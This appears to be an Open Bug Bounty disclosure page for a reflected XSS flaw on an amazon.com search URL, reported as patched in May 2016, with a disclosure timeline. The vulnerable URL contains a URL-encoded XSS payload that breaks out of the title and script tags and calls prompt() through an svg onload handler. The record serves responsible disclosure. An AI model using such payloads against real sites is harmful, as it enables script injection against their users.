logo
DATABASE RESOURCES PRICING ABOUT US

amazon.com XSS vulnerability

Description

##### Vulnerable URL: http://www.amazon.com/s/ref=nb_sb_noss/180-4938837-1377457?url=search-alias%3Dstripbooks&field-keywords;=%3C/title%3E%3C/script/%22-alert%280%29-%22--%3E%22%3E%3Csvg/onload=prompt%28/OPENBUGBOUNTY/%29%3E ##### Details: Description| Value ---|--- Patched:| Yes, at 21.05.2016 Latest check for patch:| 21.05.2016 19:40 GMT Vulnerability type:| XSS Vulnerability status:| Publicly disclosed Alexa Rank| 6 VIP website status:| Yes Check amazon.com SSL connection:| (Grade: A) ##### Coordinated Disclosure Timeline: Description| Value ---|--- Vulnerability submitted via Open Bug Bounty| 12 May, 2016 17:17 GMT Generic security notifications sent to website owner| 12 May, 2016 17:20 GMT Notification sent to subscribers (without technical details)| 12 May, 2016 18:17 GMT Vulnerability details disclosed by researcher| 21 May, 2016 19:40 GMT Vulnerability patched by the website owner| 22 May, 2016 09:53 GMT